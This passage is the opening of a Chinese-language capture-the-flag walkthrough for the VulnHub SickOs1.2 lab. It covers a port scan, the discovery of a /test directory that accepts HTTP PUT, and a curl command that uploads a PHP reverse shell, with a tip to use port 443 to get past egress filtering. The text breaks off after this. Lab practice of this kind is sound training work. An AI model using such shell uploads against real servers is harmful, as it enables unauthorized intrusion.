靶场练习-vulnhub:SickOs1.2
# 靶场搭建 下载虚拟机,导入到虚拟机,网卡调成 NAT 模式直接就能用 IP: 192.168.174.130 # 渗透过程 # 信息初收集 22/tcp open ssh 80/tcp open http 明显是 web,扫了一下路径,发现 test 外没有任何东西了,而且这个文件夹里啥都没有 发现可以使用 PUT 上传文件 于是上传反弹 shell: curl --upload-file shell.php -v --url http://192.168.174.130/test/shell.php -0 --http1.0 目标机器可能设置了出口限制,反弹端口要设置为 443...
more...








